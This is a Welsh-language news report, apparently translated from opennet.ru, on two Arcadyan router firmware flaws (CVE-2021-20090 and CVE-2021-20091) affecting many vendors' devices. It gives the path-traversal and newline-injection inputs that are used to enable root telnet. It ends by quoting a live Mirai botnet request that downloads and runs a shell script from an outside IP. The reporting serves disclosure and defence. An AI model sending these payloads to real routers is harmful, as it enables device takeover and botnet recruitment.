Bregusrwydd mewn llwybryddion cartref yn effeithio ar 17 o weithgynhyrchwyr

Mae ymosodiad enfawr wedi'i gofnodi ar y rhwydwaith yn erbyn llwybryddion cartref y mae eu cadarnwedd yn defnyddio gweithrediad gweinydd HTTP gan y cwmni Arcadyan. Er mwyn ennill rheolaeth dros ddyfeisiau, defnyddir cyfuniad o ddau wendid sy'n caniatáu gweithredu cod mympwyol o bell gyda hawliau gwraidd. Mae'r broblem yn effeithio ar ystod eithaf eang o lwybryddion ADSL o Arcadyan, ASUS a Buffalo, yn ogystal â dyfeisiau a gyflenwir o dan y brandiau Beeline (cadarnheir y broblem yn Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone a gweithredwyr telathrebu eraill. Nodir bod y broblem wedi bod yn bresennol yn firmware Arcadyan am fwy na 10 mlynedd ac yn ystod yr amser hwn mae wedi llwyddo i fudo i o leiaf 20 o fodelau dyfais gan 17 o wahanol wneuthurwyr.

Mae'r bregusrwydd cyntaf, CVE-2021-20090, yn ei gwneud hi'n bosibl cael mynediad i unrhyw sgript rhyngwyneb gwe heb ddilysu. Hanfod y bregusrwydd yw bod rhai cyfeirlyfrau yn y rhyngwyneb gwe y mae delweddau, ffeiliau CSS a sgriptiau JavaScript yn cael eu hanfon trwyddynt yn hygyrch heb eu dilysu. Yn yr achos hwn, mae cyfeiriaduron y caniateir mynediad heb ddilysiad ar eu cyfer yn cael eu gwirio gan ddefnyddio'r mwgwd cychwynnol. Mae nodi nodau "../" mewn llwybrau i fynd i'r cyfeiriadur rhiant yn cael ei rwystro gan y firmware, ond mae defnyddio'r cyfuniad "..% 2f" yn cael ei hepgor. Felly, mae'n bosibl agor tudalennau gwarchodedig wrth anfon ceisiadau fel “http://192.168.1.1/images/..%2findex.htm”.

Mae'r ail fregusrwydd, CVE-2021-20091, yn caniatáu i ddefnyddiwr dilys wneud newidiadau i osodiadau system y ddyfais trwy anfon paramedrau wedi'u fformatio'n arbennig i'r sgript apply_abstract.cgi, nad yw'n gwirio am bresenoldeb nod llinell newydd yn y paramedrau . Er enghraifft, wrth berfformio gweithrediad ping, gall ymosodwr nodi'r gwerth “192.168.1.2% 0AARC_SYS_TelnetdEnable=1” yn y maes gyda'r cyfeiriad IP yn cael ei wirio, a'r sgript, wrth greu'r ffeil gosodiadau /tmp/etc/config/ .glbcfg, yn ysgrifennu'r llinell “AARC_SYS_TelnetdEnable=1” i mewn iddo”, sy'n actifadu'r gweinydd telnetd, sy'n darparu mynediad cragen gorchymyn anghyfyngedig gyda hawliau gwraidd. Yn yr un modd, trwy osod y paramedr AARC_SYS, gallwch weithredu unrhyw god ar y system. Mae'r bregusrwydd cyntaf yn ei gwneud hi'n bosibl rhedeg sgript broblemus heb ddilysu trwy ei chyrchu fel “/images/..%2fapply_abstract.cgi”.

Er mwyn manteisio ar wendidau, rhaid i ymosodwr allu anfon cais i'r porthladd rhwydwaith y mae'r rhyngwyneb gwe yn rhedeg arno. A barnu yn ôl deinameg lledaeniad yr ymosodiad, mae llawer o weithredwyr yn gadael mynediad ar eu dyfeisiau o'r rhwydwaith allanol i symleiddio diagnosis problemau gan y gwasanaeth cymorth. Os yw mynediad i'r rhyngwyneb wedi'i gyfyngu i'r rhwydwaith mewnol yn unig, gellir cynnal ymosodiad o rwydwaith allanol gan ddefnyddio'r dechneg "ail-rwymo DNS". Mae gwendidau eisoes yn cael eu defnyddio'n weithredol i gysylltu llwybryddion i'r botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Cysylltiad: cau User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh ; curl+-O+http://777/lolol.sh ; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

Ffynhonnell: opennet.ru

Ychwanegu sylw